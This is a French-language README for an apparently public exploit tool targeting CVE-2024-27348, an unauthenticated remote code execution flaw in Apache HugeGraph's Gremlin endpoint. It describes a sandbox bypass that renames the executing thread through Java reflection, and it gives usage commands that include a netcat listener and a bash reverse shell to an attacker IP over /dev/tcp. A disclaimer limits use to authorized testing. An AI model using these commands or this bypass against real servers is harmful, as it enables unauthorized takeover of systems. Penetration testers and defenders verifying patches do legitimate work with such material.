
Exploit PoC avancé pour CVE-2024-27348, réalisant une RCE fiable dans Apache HugeGraph via un contournement de sandbox et une exécution de commande non aveugle.
Un exploit Proof of Concept (PoC) avancé et hautement fiable pour CVE-2024-27348 (exécution de code à distance sur le serveur Apache HugeGraph).
Contrairement à de nombreux PoC publics qui exécutent des commandes à l'aveugle ou échouent sur des charges utiles complexes en raison des limitations de Runtime.exec() de Java, ce script est conçu pour la fiabilité dans des scénarios réels de test d'intrusion.
Uniquement à des fins éducatives et de tests autorisés. Cet outil est fourni aux chercheurs en sécurité, aux testeurs d'intrusion et aux administrateurs système pour vérifier la vulnérabilité dans des environnements autorisés. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil.
Cet exploit améliore les premiers PoC publics en traitant trois problèmes critiques :
gremlin-server-exec-* ou task-worker-*. Cette charge utile utilise la réflexion Java pour renommer dynamiquement le thread d'exécution en BypassThread avant de déclencher la charge utile, contournant ainsi le gestionnaire de sécurité de manière transparente.Runtime.getRuntime().exec(String), qui casse les commandes bash complexes (comme les shells inversés) au niveau des espaces, cet exploit utilise ProcessBuilder avec une List<String> correctement formatée. Cela permet l'exécution sûre de charges utiles complexes avec des guillemets et des redirections.InputStream du processus exécuté à l'aide d'un Scanner Java et renvoie la sortie réelle de la commande dans la réponse HTTP JSON. Vous voyez exactement ce que le serveur voit.requestsInstallez les dépendances requises :
pip3 install requests
python3 exploit.py -u <TARGET_URL> -c <COMMAND>
Exemples
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "whoami"
# Sur votre machine d'attaque, démarrez un écouteur :
nc -lvnp 4444
# Exécutez l'exploit :
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
Le serveur Apache HugeGraph expose un point de terminaison d'API Gremlin (/gremlin) qui permet aux utilisateurs de soumettre des scripts Groovy. En raison d'un sandbox insuffisant dans les versions antérieures au correctif, un attaquant non authentifié peut exécuter des commandes arbitraires du système d'exploitation via la réflexion Java.